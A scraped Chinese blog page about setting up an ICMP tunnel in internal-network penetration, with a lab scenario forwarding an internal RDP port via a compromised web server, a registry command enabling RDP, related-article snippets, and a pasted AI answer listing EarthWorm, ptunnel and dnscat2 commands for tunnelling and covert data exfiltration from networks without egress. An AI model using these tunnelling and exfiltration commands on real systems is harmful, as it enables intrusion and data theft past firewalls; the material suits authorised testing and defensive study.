内网渗透ICMP隧道搭建

最新推荐文章于 2024-08-16 09:11:28 发布

tpaer

最新推荐文章于 2024-08-16 09:11:28 发布

阅读量459

点赞数

CC 4.0 BY-SA版权

分类专栏：从入门到入狱文章标签：服务器后端网络安全

本文链接：https://blog.youkuaiyun.com/qq_18980147/article/details/131753703

内网渗透ICMP隧道搭建

192.168.0.x模拟外网机器，1.1.1.x模拟内网机器

Linux（1.1.1.111/192.168.0.138）为WEB服务器，模拟getshell了WEB服务器的情况，通过该被控制机器将内网Windows机器（1.1.1.99）的3389远程端口映射到外网VPS（192.168.0.130）的2320端口上，黑客机器通过RDP连接192.168.0.130:2320实现远控内网Windows机器，在内网机器存在ICMP协议出网情况下即能ping通外网机器，可以搭建ICMP隧道
在这里插入图片描述

环境检查

在搭建隧道前需要确认被攻击的内网机器可以被远程连接，以下是需要检查的一些操作

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

关闭3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tpaer

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

渗透测试之隧道搭建

Finlinlts的博客

10-04

2416

基于HTTP协议 reGeorg搭建HTTP隧道 reGeorg是reDuh的继承者，利用了会话层的socks5协议，相比较于reDuh效率更高一些。关于通过reGeorg建立HTTP隧道的作用体现在，当我们能通过外网访问服务器A，但是我们并不能与位于内网的主机交互，这时reGeorg就派上了用场，假设此时我们拿到了服务器A的webshell，但是该内网主机的icmp、dns、tcp和udp协议等都不能出网，唯一的数据通道是webshell搭建正向代理。所以在公网能访问的服务器A上安装reGeo

Kali Linux渗透测试——隧道&封装

Captain_RB的博客

12-19

3799

笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程文章目录一、重定向二、隧道&封装一、重定向重定向流量的IP和端口，不提供加密处理二、隧道&封装使用多种加密技术建立通信隧道，在网络节点之间建立安全管道，在不受信任的网络环境中实现安全通信。分为两类隧道：点到点（IP2IP）: 建立在网络层，用于局域网之间的隧道通信，数据经过网络边界后变为明文传输 ...

参与评论您还未登录，请先登录后发表或查看评论

内网渗透-SSH隧道

weixin_45427778的博客

08-18

570

内网渗透之——ssh隧道网络拓扑图： ssh 正向链接：在web服务器执行 ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1 在web服务器做端口映射，将数据服务器的80端口映射到web服务器的7777端口，随后访问192.168.0.144:7777即可访问到数据库的80页面。反向连接：将web服务器的22端口转发出去到黑客IP web服务器执行： ssh -qTfnN -R 2222:127.0.0.1 root@192.

内网渗透之隧道搭建和代理配置

m0_62207170的博客

03-14

1458

内网渗透之隧道搭建和代理配置

渗透测试-----8-流量操控与隧道

weixin_62693307的博客

02-02

586

我们知道一般局域网都会开放443端口用于加密的HTTP连接，我们可以利用这点用Stunnel和远程端口443创建一个SSL连接，防火墙和代理会认为这个连接是正常的HTTPS连接而允许通过。：： user@ -p：： user@ -p其优点是速度非常快，：本地主机： user@ -p

内网渗透：利用pingtunnel搭建icmp隧道

安全大白

01-01

1414

1111111

内网渗透之icmp隧道传输

qq_55894976的博客

08-16

1073

为什么要建立隧道在实际的网络中，通常会通过各种边界设备·软/硬件防火墙、入侵检测系统来检查对外连接的情况，如果发现异常，会对通信进行阻断。# 什么是隧道就是一种绕过端口屏蔽的方式，防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装，然后穿过防火墙，与对方通信，当被封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应的服务器上#常见的隧道列举如下：网络层：ipv6隧道 icmp隧道 gre隧道传输层：TCP隧道 UDP隧道常规端口转发。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

网络空间安全学习

05-30

1443

spp隧道代理工具支持的协议： TCP、UDP、RUDP（可靠 UDP）、RICMP（可靠 ICMP）、RHTTP（可靠 HTTP）、KCP、Quic 支持类型：正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理协议和类型可以自由组合外部代理协议和内部转发协议可以自由组合。本工具使用简单，服务器、客户机各一条命令，就可建立连接。

ICMP隧道，用于内网渗透工具.zip

11-29

ICMP隧道技术是一种利用ICMP协议进行数据传输的网络通信技术，它在网络安全领域中常用于内网渗透和测试。ICMP（Internet Control Message Protocol）是互联网控制消息协议，它是TCP/IP协议族的一个重要部分，用于...

内网渗透系列：内网隧道之spp

闵行小鱼塘

04-09

3770

本文研究支持多协议双向代理的一个工具，spp

内网渗透测试：隐藏通讯隧道技术（上）

weixin_46236101的博客

10-06

730

什么是隧道？在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。常用的隧道技术有以下三种：网络层：IPv6 隧道、ICMP 隧道传输层：TCP 隧道、UDP 隧道、常规端口转发应用层：SSH 隧

内网渗透| 隧道穿透的搭建从简单到高阶

MachineGunJoe666

07-07

621

spp -name "test" -type proxy_client -server 服务器的ip -fromaddr :客户端木马端口 -toaddr :服务器端木马端口 -proxyproto tcp -proto ricmp。frp是一个专注于内网穿透的高性能的反向代理应用，支持TCP、UDP、HTTP、HTTPS 等多种协议。转发规则攻击机:5555 VPS:6000

网络安全入门，渗透测试详细介绍和流程方法

aobulaien001的博客

06-08

776

渗透测试就是模拟攻击者入侵系统，对系统进行一步步地渗透，发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固，提升系统的安全性，防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试，就是违法行为!

内网渗透系列：内网隧道之iodine

闵行小鱼塘

04-09

1498

本文研究DNS隧道的一个经典工具，iodine

隐藏通信隧道技术

qq_43590351的博客

08-30

5504

渗透中内网隧道的建立。

CobaltStrike使用-第八篇-隧道技术（socks转发、ssh隧道、CS转发监听器)

Love&Share

12-07

5423

文章目录流量转发Socks转发MSF 连接到 Socks 代理服务使用 ProxyChains 进行代理转发转发监听器(反向链接)SSH隧道参考链接本篇文章将会结合CS介绍在内网渗透中经常用到的隧道技术，这已经是第二次介绍隧道技术了，本篇环境将会比第一篇复杂，第一篇链接在这，我是链接流量转发 Socks转发目前已经拿到了server2008-2的会话，但是域控主机在内网，不能和CS TeamServer直接通信，所以需要添加代理转发在进行转发操作之前，需要将当前会话改为交互模式，也就是说输入命.

内网渗透测试：隐藏通讯隧道技术

qq_45521281的博客

02-21

3120

我的Freebuf：https://www.freebuf.com/author/MrAnonymous 我的博客：https://whoamianony.top/ 文章目录什么是隧道？先判断内网连通性网络层隧道技术IPv6 隧道ICMP 隧道icmpshPingtunnelicmptunnel传输层隧道技术lcx端口转发内网端口转发本地端口转发二者结合使用NetCat——瑞士军刀内网代理PowerCat应用层隧道技术SSH协议本地转发实验远程转发实验动态转发实验HTTP(S)协议reGeorgSOCKS.

多层网段渗透-真正理解socks代理隧道技术

jklbnm12的博客

09-13

955

多层网段渗透-真正理解socks代理隧道技术写在前面在多层网段渗透时，我们经常会遇到各种代理隧道问题，而有些问题还是挺难理解，需要我们去思考，接下来我将主要介绍隧道代理技术，漏洞利用简单带过。环境大致过程：首先拿下Target1主机，以Target1为跳板，攻击Target2，攻击Target2后，再以它为跳板攻击Target3。攻击Target1 访问192.168.76.148这台主机的网站，发现他的网站是用thinkphp v5搭建的。直接使用thinkphp v5的exp进行攻击,

渗透测试内网不出网怎么办

最新发布

03-21

<think>好的，用户在进行内网渗透测试时遇到了无法出网的情况，需要解决方案。首先，我得回忆一下内网渗透的常见方法，尤其是没有外网连接的情况。通常，这种情况下需要利用内网中的现有资源进行横向移动和数据回传。首先想到的是Socks代理，比如使用EarthWorm或reGeorg这些工具，通过建立代理通道，让内网的流量能够通过已经被控制的机器转发出去。但用户提到不出网，可能意味着目标机器无法直接连接外网，这时候可能需要利用内网中其他可出网的机器作为跳板，不过如果整个内网都不出网，可能需要其他方法。接下来是ICMP协议，因为很多防火墙会允许ICMP流量通过。使用ICMP隧道工具如ptunnel或icmpsh，可以将数据封装在ICMP包中进行传输。这样即使TCP/UDP出网被限制，ICMP可能仍然可用。不过需要注意目标网络是否允许ICMP流量，有些严格的环境可能会限制。 DNS隧道也是一个选项，像dnscat2这样的工具可以利用DNS查询和响应来传输数据。因为DNS服务通常需要解析外部域名，所以即使其他协议被阻断，DNS流量可能仍然存在。但这种方法需要有一个可控的域名，并且配置DNS服务器，可能会比较复杂。文件传输方面，如果无法直接外传数据，可以考虑将数据存储在内部服务器上，或者使用内部共享、邮件等方式。比如，把数据打包后上传到内部FTP服务器，或者通过内部邮件系统发送到控制的邮箱。不过这种方法需要找到可用的内部服务，并且有权限访问。横向移动技术，比如Pass The Hash、利用PsExec或WMI执行命令，可以在内网中移动到其他机器，寻找可能存在出网通道的主机。如果找到一台能够出网的机器，就可以利用它作为跳板。比如，使用Mimikatz获取其他用户的凭证，然后通过PsExec连接到其他机器，再从那台机器向外传输数据。还有可能需要搭建临时的内部代理或中继服务器。例如，如果有一台Web服务器可以对外访问，可以上传一个webshell，然后通过该webshell建立反向代理。或者利用内部的数据库服务器，通过SQL注入执行命令，进而建立通道。另外，可能需要检查内网中的开放端口和服务，寻找未被防火墙限制的协议。比如，有些环境下可能允许SSH或者RDP的特定端口，可以利用这些服务进行隧道传输。使用工具如sshuttle或者Plink建立SSH隧道，将本地端口转发到外部服务器。最后，如果所有方法都不可行，可能需要物理接触设备，或者利用社会工程学手段获取更多访问权限。不过这在渗透测试中可能超出授权范围，需要特别注意。需要验证这些方法的可行性和对目标环境的影响，确保符合测试的授权范围。同时，考虑日志和监控，避免触发安全警报。可能还需要组合多种技术，逐步深入内网，寻找突破口。</think>### 内网渗透测试无外网连接解决方案 #### 1. 基于Socks代理的横向渗透通过工具如 **EarthWorm** 或 **reGeorg** 建立内网代理链，利用已控制的机器作为跳板： ```bash # EarthWorm示例（反向代理模式） ./ew -s rcsocks -l 1080 -e 8888 ``` 在目标机器执行反向连接： ```bash ./ew -s rssocks -d <控制端IP> -e 8888 ``` 此时可通过本地1080端口访问目标内网资源[^1]。 #### 2. ICMP协议隧道传输当TCP/UDP出网被阻断时，使用 **ICMP隧道** 工具： - **ptunnel**：封装TCP流量到ICMP包 ```bash # 控制端 ptunnel -x password # 目标端 ptunnel -p <控制端IP> -lp 1080 -da target_ip -dp 22 -x password ``` 通过`ssh -p 1080 user@localhost`即可访问目标SSH服务[^2]。 #### 3. DNS隐蔽信道使用 **dnscat2** 构建DNS隧道： ```bash # 控制端 dnscat2-server --secret=password # 目标端 dnscat2 --dns server=<域名>,port=53 --secret=password ``` 支持文件传输、交互式Shell等功能，依赖域名解析权限[^3]。 #### 4. 非协议级文件外传若协议层完全封闭，可采用： - **内部服务暂存**：将数据上传至内部FTP/Web服务器 - **物理介质模拟**：通过打印机队列、共享目录流转 - **内存驻留技术**：使用 **PowerShell** 脚本加密暂存数据 ```powershell $data = Get-Content sensitive.txt -Raw $encrypted = ConvertTo-SecureString $data -AsPlainText -Force $encrypted | ConvertFrom-SecureString | Set-Content temp.dat ``` #### 5. 协议复用技巧针对特殊场景的流量伪装： - **HTTP头注入**：在正常Web请求中夹带数据 - **RDP虚拟通道**：通过远程桌面协议传输文件 - **SCSI命令注入**：利用存储协议的特殊指令